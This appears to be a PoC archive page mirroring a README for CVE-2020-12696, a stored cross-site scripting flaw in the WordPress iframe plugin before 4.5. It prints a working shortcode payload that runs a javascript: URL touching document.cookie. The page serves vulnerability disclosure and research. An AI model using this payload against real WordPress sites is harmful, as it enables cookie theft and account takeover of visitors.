Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-12696 PoC — WordPress iframe 跨站脚本漏洞

Source
Associated Vulnerability
Title:WordPress iframe 跨站脚本漏洞 (CVE-2020-12696)
Description:WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。iframe是使用在其中的一个用于将另一个文档嵌入当前HTML文档中的内联框架。 WordPress iframe 4.5之前版本存在安全漏洞,该漏洞源于程序无法清理URL。目前尚无此漏洞的相关信息,请随时关注CNNVD或厂商公告。
Description
Stored Cross Site Scripting - Iframe Plugin - WordPress 
Readme
# CVE-2020-12696

```
██╗  ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
 ╚███╔╝ ███████╗███████╗
 ██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝  ╚═╝╚══════╝╚══════╝
```  

**Iframe < 4.5 - Authenticated Stored Cross Site Scripting (XSS)**

The iframe plugin before 4.5 does not sanitize a URL.

    Payload: </b>[iframe src="javascript:confirm(document.cookie)" width="100%" height="500"]
    Version [plugin]: </b>4.4
    Tested on: </b>WordPress 5.2.4
    Researcher:</b> Guilherme Rubert

<br>

**References:**

https://guilhermerubert.com/blog/cve-2020-12696/
<br>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12696
<br>https://wordpress.org/plugins/iframe/#developers




File Snapshot

[4.0K] /data/pocs/a7be3070bfc4ecbba28688b7ded68067b4e0ea0c └── [ 964] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.